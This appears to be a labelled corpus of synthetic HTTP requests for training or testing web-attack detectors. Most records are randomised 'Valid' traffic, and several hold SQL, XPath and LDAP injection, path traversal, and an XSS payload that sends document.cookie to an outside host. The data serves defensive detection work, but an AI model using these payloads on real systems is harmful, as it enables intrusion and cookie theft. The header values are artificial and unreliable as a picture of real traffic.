~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28117
Start - Id: 25203
class: Valid
GET /gi1tm/rtdOs2ldeie7a/eTw/9mY._QX7FCfr/a4n0wdyptlwax6la.nsf?2r=mn&HIMqvm=oipP6J&Sg7=i9tstasagr%283sf9&2thSL5hhe=cu&6yauj=il6syer HTTP/1.1
Host: www.sehTcti.fr
Connection: close
Accept: application/x-tar, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 41.95.155.11
Cookie: q6OID71cUC=oenzDidm;9atnds=taetousana4dl;sdunF6=es\ntso nk7p(/utts0
Cookie2: $Version="2"
Date: Tue, 05 Jul 05 06:06:15 CET
ETag: "q9BvBsmK@35ZBtE99Y"
Expect: 100-continue
From: f4jyigtN@wdnsEa.uk
If-Modified-Since: Fri, 03 Jul 09 01:25:48 GMT
If-Unmodified-Since: Fri, 20 Jun 08 12:15:29 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 10 Jan 10 24:12:04 GMT
Max-Forwards: 49
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic b3RzYWl0RWE6c2VzYWRh
Authorization: Digest username="ayl3"
Range: 644-8,31755-
Referer: /aoermP/eecroa/WcLx.msf
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: yerUeYsa1ea75
UA-CPU: x86
UA-Disp: 334,5908,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5457x802
Via: 7.8 www.abqAh.png, 3.4 160.101.123.141, 0.2 150.27.144.159
Transfer-Encoding: deflate
Upgrade: en6mi/1.2, pYie/2.8, 2tts/2.9, 7e6Es/2.9, etyr/8.1
Warning: 324 www.hoohl.html:890 "deeeTetsgan" "Sat, 03 Dec 05 12:00:06 CET"
X-Forwarded-For: 243.124.209.190
X-Serial-Number: 39906730696975900354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25203
Start - Id: 42237
class: SqlInjection
GET /a1bhmusVz_AlrVhdF9A/M2TRnVxK/vwf8ruurisooto8t0u/tM6cbkEuO/vdltm4ccnbE3cinartha/ec/fWXHhvbscriptMYbin5r/t7TmWahaV5x8oTlB/Cpr5uer0/itb8sanTdrsn/rxKoDE.htm?hrjEdedaee=wrrrE%25teiwr2ni&e7retthnlo=sxC&ah1a=6100&nihshs=1428099&ec0heeLkf9u=%27+++union+++select++sum%28mdreo%29++++from+++qscraw--&oermhreyT3Hre=9774&oprettd=07&iFdocumenteMuamEH=4owei&lpsat5saenr=0707&rralIIsm=cOL&7roHiwewdgdwx=h8 HTTP/1.1
Host: 133.216.208.222
Connection: keep-alive
Accept: video/mpeg;q=0.3, text/xml, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oatj-ao9, srRr3i6o-imt3;q=0.4, uytteu-ceA;q=0.4, aw-9r, itn6p-riguso6i
Cache-Control: max-stale
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Sun, 29 Feb 04 21:15:42 GMT
ETag: "o5Hri.IYcI-wCtzH0"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Fri, 09 Jan 04 05:55:08 CET
If-Unmodified-Since: Sun, 14 Jan 07 09:19:40 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Mar 06 11:02:42 UTC
Max-Forwards: 727
MIME-Version: 1.3
Pragma: dsrpme='6uovj'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Digest nc=a0FdD946
Range: 4539-14148,-19,934-
Referer: http://www.i8Nd.org/tN9iis/aroOeeac/teeS5ee/sbst.mpg
TE: deflate;q=0.7,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (X11; U; Unix 7.3; pu-Yr; rv:0.2.6) Gecko/55064886
UA-CPU: x86
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: 6.3 178.44.128.127, FTP/4.4 171.16.167.255:557, HTTP/0.0 www.ffdaf.gif
Transfer-Encoding: compress
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 5569851248014
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42237
Start - Id: 15185
class: Valid
GET /sHnGsy/ahnan/cu@v7kKB2dGj8Wgj83_/abHgV9qR-/DditailawltbaWrrooo/ie/tm/B5W/ine8t1tuhsuotuphEmnw/cTecGh.swf?ZjJtGeMVuboot.iniH=odj%3Bydpvp%26hkd&emlikeR7Ib80d=eoare2y9Thn9pr4oD&iaOrO=240&hf=3fh0jPVe&cF=sa1tniaesUyly&thtT=bgOUoIWs6&etgHebs=e%5DgeLSno&aaavsEtaOt=tereteE&eR=e6LfxAT&scrttptsyaqo=r8dMk4rrQ&sgwcs5txoR=fbotwo5eei3ipor&ed2tui=84385107 HTTP/1.0
Host: www.shddreioni.st:6
Connection: close
Accept: audio/x-wav;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.15.146.53
Cookie: w1NR3lrsae=641081665
Cookie2: $Version="163"
Date: Wed, 07 Apr 10 18:49:22 CET
ETag: W/"bk2jeoA94xu4PM.x0VY"
Expect: 100-continue
From: hhshpbs@mnyd.cz
If-Modified-Since: Thu, 11 Mar 04 09:34:56 UTC
If-Unmodified-Since: Tue, 13 Oct 09 20:17:48 GMT
If-Match: "sTaW1ktxMFb-jrLbfUj"
If-None-Match: "-l1AoOMRN4RklJL@cfH_"
If-Range: "-kBhsyvCo0pNxc3C6Xz"
Max-Forwards: 2
MIME-Version: 7.8
Pragma: ee8=Yy
Proxy-Authorization: Basic ekswYTpsSHJlYXJo
Authorization: Digest nonce
Range: 478892-,53727-
Referer: /eatoaog/xlua/tlaule7/XAeIdel.tar.gz
TE: gzip
Trailer: Range
User-Agent: yrBA7auT (n1elXVE; nXKnpw-w6; nE6tezLZHq; tWDfYxAtr7; t9OzvraNWS)
UA-CPU: x86
UA-Disp: 5093,9820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: 1.4 94.195.189.236, FTP/3.9 114.244.112.95
Transfer-Encoding: aA9c
Upgrade: 7jpt9/1.4, who/8.3, alnadh/2.9, eAa/5.4, imc/9.8
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 656353
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15185
Start - Id: 49213
class: XPathInjection
GET /sj7UpCqLf0b98VdWZ/soyiseXtree/sb/tUfugyHR1u/Nnnoe4Auiacr7lt/AWv62XY9c/aQ7pxBgsZLqO_qjC.swf?mn=rtwfntql&NV9BPkJQQ4Yg=ocd&mocdhp=teeoai6metk2g&hctaeaOg5rja=0293&shh=et+iyo9t%3CetHpassthru&ocpuancedtrineo=6dst&reoe=oi%27%5D+++++%7C+P+++%7C+%2F%2Fuser%5B+++++name%2Ftext%28%29++++%3D%27mtepc&7ptthre=taaostientDtat&e5oa8et=styleua+Mn+tenet&aeNausAs0icet9=kyehd1digs&sh4mwnhenr=70301&lcc7t=d4DXbfk0-- HTTP/1.1
Host: www.haw1aopJt.biz
Connection: close
Accept: */*
Accept-Charset: cp-936, x-mac-ce;q=0.3
Accept-Encoding: deflate
Accept-Language: *;q=0.5
Cache-Control: min-fresh=26224
Client-ip: 107.0.134.67
Cookie: dyRecrlnddaulH=ontaieah;5XZcR=formAusA=n4plwot;LNB@PQEUUvu=e(nf;cvrh6eds=>);hdm=3;sMb5oyocnp=046918
Cookie2: $Version="19"
Date: Sat, 20 Jan 07 04:25:25 UTC
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Sun, 02 Oct 05 15:36:30 GMT
If-Unmodified-Since: Tue, 23 Nov 04 18:26:08 GMT
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Thu, 08 May 08 14:14:29 CET
Max-Forwards: 54
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Digest cnonce="ltAratn"
Range: -392691
Referer: http://t2hmylp.de/dah7gejr/sl9q/vde6iwO/coOhts/Geo3xT6N.msf
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/2.1 (X11; U; Linux i586 8.4; Ut-fl; rv:0.2.5) Gecko/21634457
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: Ynaxa; wehrdt=zceaomO
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49213
Start - Id: 33804
class: Valid
POST /3la/s4see7e8Hteul/s697_gc/aIaVQfIRIo/dGz7hj7swkWdO.p8wX/dHLwhyj9dp0@W/5iUnCiU/fjhnl0uoaninet/kjE-f0bSuWNUSaoZyrWR/z_UBoV@logcHUopenWzA/qc678eqcmyhnttpa.php? HTTP/1.0
Content-Length: 272
Content-Language: ebcnam,bja
Content-Encoding: deflate
Content-Location: http://aIthas.org/gAt6uneE/a4sSf/rxrm0i.nsf
Content-MD5: dEVlaG1kYTNvMm13bnNpNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Sep 04 14:07:49 UTC
Last-Modified: Sun, 17 Aug 08 13:52:56 UTC
Host: www.mvrras.uk:008
Connection: keep-alive
Accept: text/*;q=0.6, video/quicktime
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: z7s4xny-aeho;q=0.6
Cache-Control: only-if-cached
Client-ip: 172.247.173.76
Cookie: mutecocCxs5b=opnt;AzDy2f=7sttzrxp_
Cookie2: $Version="808"
Date: Thu, 24 Feb 05 11:19:54 CET
ETag: W/"5BC4Gd-FX33pib1l"
Expect: c9cyhx
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Wed, 15 Feb 06 08:25:24 GMT
If-Unmodified-Since: Tue, 11 May 04 11:41:45 GMT
If-Match: "HEzTJBOSXIIAvlAJ"
If-None-Match: *
If-Range: Sat, 20 May 06 16:17:30 CET
Max-Forwards: 9
MIME-Version: 7.3
Pragma: rsS=s5elo
Proxy-Authorization: Basic c29lM2F2eWE6dWRlb2c=
Authorization: Digest response="145C10d7E19E1A240F05D933Bd302bFc"
Range: 54-,81-
Referer: /sueo/tAiac/ImhUoaa.rar
TE: deflate
Trailer: Accept
User-Agent: Mozilla/8.7 (X11; U; Linux i586 1.8; he-p6; rv:1.3.9) Gecko/29684613
UA-CPU: x86
UA-Disp: 384,417,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 551x0838
Via: 5.2 50.10.118.182, 7.9 www.aaeO.tiff:25014, FTP/1.4 www.bpi9E.tiff:31639
Transfer-Encoding: compress
Upgrade: ait/6.8
Warning: 439 www.eoera.jpg "bg9r8au3atu" "Fri, 15 Feb 08 09:18:04 UTC"
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 9495993319607061113
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

oio=g'libi+&Bqn2D9@y3-=sc&cipiliopyr=friJt&ycmrwxh=eg&rNi=havMe]&ehseBenmo=962500333&VQNAH6.0WnetcatsO=7i&aXaEhtpassrt=ya7a&mqsk3odosx=(nE&xtmpYyYu5Z=euFy@rhDsz&amhtqszse2e=cg2S&os9assa=rn1U&4tlNHtszae9cELc=f s&nwinfuNd0sembek=ftps\te&dfvrP@=acesr3:0d<edln

End - Id: 33804
Start - Id: 44666
class: PathTransversal
GET /fpX/8lGRql/9r/iOEwW/rPU.uh8y8i4eUPd/s73mH_w-/nw0W.NqKLSH/64rP./Echlo9tbv4adyaskbio.php?rluid1hdsennee=E+iuiaobjectyoereaZ&EtS0imvo=d&KtyupdateWnph-EFvJ=eTT02IXU&y.fw=bsE&edaHehjtetaUR=t5n&ktgrEnukneaeso=6714&0tGscriptxRSupdate0._K=019677375&cuwpxGsse=6576295&8_Nw@-t4GQ=k%3FTo%24todtqoai&u-SRt=ejvuiii2 HTTP/1.1
Host: 76.197.173.12
Connection: close
Accept: image/gif, text/xml;q=0.8
Accept-Charset: euc-tw;q=0.1, iso-8859-15
Accept-Encoding: 
Accept-Language: e-ermfrns, ortbhrtc-0ioj;q=0.5
Cache-Control: no-store
Cookie: 2jt=9294;8Kqqb=739864;TrftcitraES=./.././.././.././../;seep4a=2660746900;jnahn=64319
Date: Sun, 10 Aug 08 12:12:26 CET
ETag: "Wb4rFHP0X1Jc6ektHn"
From: Jatw@uras.it
If-Modified-Since: Mon, 17 Nov 08 07:45:14 GMT
If-None-Match: "ivHtfCPxR8lVdEHjT"
If-Range: Sat, 21 Jul 07 20:15:28 GMT
Max-Forwards: 0024
MIME-Version: 7.1
Pragma: hnlmees='ece0'
Authorization: ietwhn uraniar=eoeggtt
Range: 267-5496
Referer: /eayrstne.css
TE: deflate;q=0.9,deflate;q=0.8
User-Agent: ueohI/6.4.2.8
UA-OS: WinNT
UA-Pixels: 014x987
Via: 7.2 227.26.180.28, FTP/3.7 245.207.68.99, 3.8 25.101.71.253
Transfer-Encoding: gzip
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 72425044847598734540

null

End - Id: 44666
Start - Id: 8841
class: Valid
GET /eEB9IK/a_/mGe0RP/n_YK.lgD13NxrP/KSIXFsWBjs/se2t/enim/02GwG/saeuUpirmcyhstn/l0s80O95WQROv/laservicesgls.exe? HTTP/1.1
Host: www.brmmoBe0gb.uk
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: c-ynRnmnbe
Cache-Control: no-cache
Client-ip: 34.60.153.94
Cookie: zOtT1ere=Heiteoh4lgoyasc;9nfBmijoryeeoi=<<a0efb@itle;u8iY=o7B0sX;nyfmpRconnectQ=nsohc;ri1nlofas1Esnp=2;ihed1ud7yaoeala=;sw
Cookie2: $Version="6"
Date: Wed, 24 Mar 04 22:50:43 CET
ETag: W/"95MocJfVdQq6DGH"
Expect: 100-continue
From: uq6Ima@5ccuIm.net
If-Modified-Since: Tue, 03 Mar 09 10:01:16 GMT
If-Unmodified-Since: Mon, 23 Mar 09 22:22:07 UTC
If-Match: "9D6xvip.KVi1VZ5S@i_"
If-None-Match: "S65JCG-9SvA01JX9P"
If-Range: *
Max-Forwards: 325
MIME-Version: 0.3
Pragma: hHWlwn=rrirrew
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Basic YXZndTpvZWVqbw==
Range: 01-5579,5729-
Referer: /oeiIin/eibra/iehp8/taant.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.7 (X11; U; Linux i586 3.7; td-os; rv:9.3.7) Gecko/76810074
UA-CPU: x86
UA-Disp: 344,093,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 186x0429
Via: 5.5 185.230.64.238, 7.9 www.Sc2sNt8s.jpeg
Transfer-Encoding: tNxih
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 629 51.114.84.67 "oerorR" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 56388963279118
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8841
Start - Id: 35880
class: XPathInjection
GET /tnT/E5DoLCGecho/hi/sX/roAexmHG4f0QJR@C/2./_v.@A6from/mxandincluder.XRRFlG.html?bujvarY0Hskmocha=LiEyoe%26dehiianEoreca&ee=4534+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++7640%3D HTTP/1.0
Host: www.nfldnMa.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 229.58.226.230
Cookie: l0ysttdtsneOyoe=tquPwP
Cookie2: $Version="19"
Date: Sat, 13 May 06 20:41:35 UTC
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: suitS@oroHhO.fr
If-Modified-Since: Thu, 18 Dec 08 06:31:56 UTC
If-Unmodified-Since: Thu, 23 Jul 09 22:16:43 UTC
If-Match: *
If-None-Match: "dH-d6UL5WEj7oTz"
If-Range: "m5X1tOvlV0J7tULf@a0w"
Max-Forwards: 6154
MIME-Version: 4.5
Pragma: snekhek='neSn2'
Proxy-Authorization: Digest nonce
Authorization: fnr1a evaef=tkiEpein
Range: 3-18807,30473-219,305975-44534
Referer: /spneio/rwibhai/sneo.msf
TE: trailers
Trailer: If-Match
User-Agent: yfir/3.3.2.3
UA-Disp: 7612,056,16
UA-OS: Linux
UA-Color: color32
Via: 4.7 www.PAc7r.jpg, FTP/0.4 121.163.23.197:4130, eaRyk/8.4 www.dan9.gif
Transfer-Encoding: identity
Upgrade: gcrb/0.6, crsswo/7.2, snqe/2.1
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35880
Start - Id: 47260
class: XSS
GET /tr/oR5x836L/uujyvlePGkuB/tcydw_iTWB_/6L5Aa/quimtoe5ch/dBbvzETkPQB@EL/6MtoO77aR/ihamysoTqehhcses1mh/re/Uj3Xupdatefhf.jpeg?efeusceo2lme=nisaach&RogBez=crtseya&lnbIe7zeoai=85403&2PtelnetCuEV=soRanrgteip4rfie&elU8te=%3Cxml++++id+++%3D++%22+++X+++%22+++%3E%3Ca+%3E%3Cb+%3E%26lt%3Bscript%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.ndlemach.com%2Fcgi-bin%2Fmeinmasi.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+++%3E%3B%3C%2Fb%3E%3C%2Fa+++%3E%3C%2Fxml++%3E&RBMTXNAw0q=867679&fLZdW2DSlogexecq=4oawp0rrs8drcdn HTTP/1.0
Host: 106.11.10.163:80
Connection: close
Accept: text/html, image/*;q=0.5
Accept-Charset: iso-8859-2, windows-1251;q=0.4
Accept-Encoding: compress;q=0.9, gzip;q=0.5
Accept-Language: nztetnon-qilxer
Cache-Control: min-fresh=71
Client-ip: 10.37.184.28
Cookie: Sidn0odethlk8o=nXNl8Gk;hhcamsolkfxx=rxrjdsnS;5i3ealHl=unneee;toraee6s6idf=4671529;xdip=jxSqc
Cookie2: $Version="945"
Date: Mon, 19 Jan 09 16:18:35 CET
ETag: W/"@OEkWCntSveC_WB"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 Sep 07 15:28:44 GMT
If-Unmodified-Since: Sun, 24 Jan 10 03:34:57 UTC
If-Match: "NEQ1xIigljmLlzlZuTHm"
If-None-Match: "qAvsBsEgX6ppumTUl"
If-Range: Thu, 04 Mar 10 12:02:16 UTC
Max-Forwards: 5303
MIME-Version: 3.6
Pragma: yar=encervSm
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Basic b2VucTc6aWhlZm5Fbg==
Range: -1,528-520677
Referer: /iaaNenD/tltptno.mdb
TE: deflate;q=0.1
Trailer: Warning
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 6.3; hg-no; rv:6.2.5) Gecko/50101764
UA-CPU: Sparc
UA-Disp: 571,3575,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 077x3740
Via: 4.9 56.143.93.248:15
Transfer-Encoding: identity
Upgrade: hth/1.0
Warning: 109 34.121.129.24 "7lqe" "Mon, 29 Oct 07 23:17:08 CET"
X-Forwarded-For: 5.39.123.102
X-Serial-Number: 15152704800
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47260
Start - Id: 33321
class: Valid
POST /rce8smJoaeeju5Leldl/rWx9RZ/adminO9rx6/dt/wpSU315ARatNwARnMT/snM5kcvOrs/a7rfz0aoaFceealaTanD/mBQZ7Ejm/eG/iuqdle.shtml? HTTP/1.0
Content-Length: 18
Content-Language: mahhtte,a,rso
Content-Encoding: compress
Content-Location: /lise/r1Hem/uthkhi.tiff
Content-MD5: MnRPcHhkY2lhZWFOZXR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 10 03:19:11 UTC
Last-Modified: Sun, 29 Mar 09 04:09:53 UTC
Host: www.e8tsse.uk:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: big5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 236.113.92.64
Cookie: nsrp9mp1=96;Nang7rpaed=iYtMEyo;j6o=79798187
Cookie2: $Version="03"
Date: Wed, 25 Mar 09 12:05:59 CET
ETag: W/"aYE2lX5JEkSIDDOqg1n"
Expect: hTuga
From: rcidi8@tsUeIwinez.net
If-Modified-Since: Sat, 08 May 04 16:37:16 UTC
If-Unmodified-Since: Sun, 27 Jan 08 01:50:05 GMT
If-Match: "IJct.Y7LchC4Q@Pg@Krc"
If-None-Match: *
If-Range: Sat, 13 May 06 14:26:45 CET
Max-Forwards: 77
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest response="82Aefeab6F6E793D521a04Cc9Ec2D0A4"
Authorization: Digest nonce
Range: 6-,39-,43-
Referer: /nrohcgl/totRinrn/osesgss/e4r2remE/peeaWe.conf
TE: deflate
Trailer: User-Agent
User-Agent: fztiezuW (t_oTVW; urb.BTWcKY)
UA-CPU: StrongARM
UA-Disp: 6610,281,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1181x772
Via: 4.9 201.233.67.117, HTTP/1.2 www.drGsn1n2.js
Transfer-Encoding: compress
Upgrade: erraNN/6.8, erpl/9.7
Warning: 225 8.156.160.60 "gIs0jtndnqerEqatp" 
X-Forwarded-For: 178.187.50.135
X-Serial-Number: 199322
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mrtta=hoe @rn$

End - Id: 33321
Start - Id: 15795
class: Valid
GET /ySet/binetc/IH4AgU/aZ2ZM7gmne6uqZ1YX-3L.pl?Ol9bqp8Gyg=tTN&C2Zly3UMnT_=9440120&Bp5Vj-s=luh HTTP/1.0
Host: 172.176.167.4
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.5, x-mac-arabic;q=0.3
Accept-Encoding: identity;q=0.4
Accept-Language: 8tromy-te8hode, te6Tf-emer3M
Cache-Control: i5wwcB=Sioe
Client-ip: 159.176.236.50
Cookie: 9nNetulpsddh=4;eez3retreohI=rb<n;lihsnPhlteveb=)tynn;oyMnaametmi=384065
Cookie2: $Version="392"
Date: Sat, 27 May 06 06:35:51 GMT
ETag: "suDcxKnKrhBoK3XE.yUO"
Expect: 100-continue
From: enag0ez@aejbBetotm.com
If-Modified-Since: Sun, 11 Jan 04 04:50:34 UTC
If-Unmodified-Since: Tue, 04 May 04 07:13:42 UTC
If-Match: *
If-None-Match: "VBDPZGmavrRHkCiC3PfP"
If-Range: *
Max-Forwards: 269
MIME-Version: 0.5
Pragma: 9paety=tnOoedh
Proxy-Authorization: Digest uri=http://emrrs.uk/eCsa/atRe/Sh9e/tejtAlw.ace
Authorization: NTLM ZWlnc1R0c3JFZ25NaXdlOGZ0dHNpcjR1aW5ieWZnYXhyZWgwd2RXbQ==
Range: -0,-3358,3280-395
Referer: /qh9sa/bdttiei/0mrtx/ch8ta.nsf
TE: deflate;q=0.2,chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (X11; U; Open BSD i386 7.7; pu-ew; rv:3.1.0) Gecko/46304914
UA-CPU: StrongARM
UA-Disp: 3907,1004,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9100x614
Via: FTP/3.6 190.248.141.136:564, FTP/9.9 www.Etaenf.tiff, FTP/2.2 www.bmiC5.jpg:6
Transfer-Encoding: gzip
Upgrade: iercSi/3.4, rnry/0.4, onpiw/4.8, bhtr/3.8
Warning: 199 www.itOetlsd.tiff "wotper5eMaRnsi3mHstd" "Sun, 18 May 08 03:17:26 CET"
X-Forwarded-For: 162.47.119.236
X-Serial-Number: 711196444045692
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15795
Start - Id: 38406
class: LdapInjection
GET /hicItiietpeytaer.php?iDn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&aici=ta&vYVO.25J=eOnwc0A2 HTTP/1.0
Host: 219.189.194.9
Connection: keep-alive
Accept: image/*;q=0.5, image/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 167.68.68.243
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Sat, 11 Sep 04 03:41:27 GMT
ETag: "G4D6p25u0LPhzxVbK"
Expect: c2dEa
From: eife7@tfrg4tnjm.cz
If-Modified-Since: Sun, 01 Feb 09 16:32:11 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Sep 04 18:54:04 UTC
Max-Forwards: 0101
MIME-Version: 0.1
Pragma: oew3ac=hl
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: NTLM ZWhjOXhiaWlzZ3djbmFlbElBZXJ4ZUdvOUVkZXN4ZWllMnd0dG5uemVibHV3Yw==
Range: -96373
Referer: /ttst.mpeg
TE: gzip;q=0.0,deflate;q=0.5
Trailer: From
User-Agent: gewbtereI
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7262x7113
Via: FTP/0.0 196.51.159.170, t5ode/5.4 www.aIeotEm.jpeg
Transfer-Encoding: deflate
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 898 www.secjq7.html "al2eoya0cgtS" 
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38406
Start - Id: 16418
class: Valid
GET /lfT4Oj-CW6_ybYdA/o@zYW/34NeXkrbtNi@8Fbt/egSDs3z/ui.T2HxoIQ/drgn1TEarsafttRytt/ZldocumentVhcHByDgroup by68/ufD85eeegJalaae1u/apsesetogenh4i.html?rzge=tsc&otniptew0Eum7s=74343591&tjte=hsO&otno=62&group byNQGtZRdh2o=0890&ehr=teEA3&st=nadtt&bsrulmsixertiSe=ndgG12w&f54atuov=St6tmpytOnce+l5btbte%24ae&jcrfn=nph-ahesebodyRec HTTP/1.0
Host: 18.88.180.192
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, big5, windows-1253, x-mac-roman;q=0.7, cp-932;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=70962
Client-ip: 30.116.144.95
Cookie: etalarI=wA> eeselecthn>na;r3silce=&l+B;soUenlfh=1tJ4nkeaRd;eeet=orse t>fbnls%irg;vseiwoee3seoSsm=263569;vEIZ= +ga ceT
Cookie2: $Version="0"
Date: Wed, 23 Nov 05 23:22:35 GMT
ETag: W/"ELuKWD.6ev4rHFqIY5H"
Expect: 100-continue
From: Sgspznl@eul4hW.net
If-Modified-Since: Sun, 28 Mar 04 17:03:42 CET
If-Unmodified-Since: Thu, 09 Jun 05 22:36:26 GMT
If-Match: "kIHCXFv9Rf8qO2W8JY9L"
If-None-Match: *
If-Range: Sat, 11 Dec 04 14:58:03 GMT
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/isau/hiace.nsf
Authorization: Sc0s eethems=Lg3w
Range: -504,0-54380,72-
Referer: /h7rm/icllTeuo/n9dSe.pdf
TE: deflate;q=0.6,deflate
Trailer: Host
User-Agent: Mozilla/5.4 (X11; U; Solaris 0.2; ld-qn; rv:1.4.3) Gecko/88759613
UA-CPU: PowerPC
UA-Disp: 227,815,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9846x663
Via: eEop7j/8.8 www.cHnyau8s.jpg, Cetree/7.9 www.lnRen1x.shtml, FTP/7.6 115.69.198.59
Transfer-Encoding: compress
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 597 131.243.210.234:4 "dcab" 
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 493178
----: -------------------------
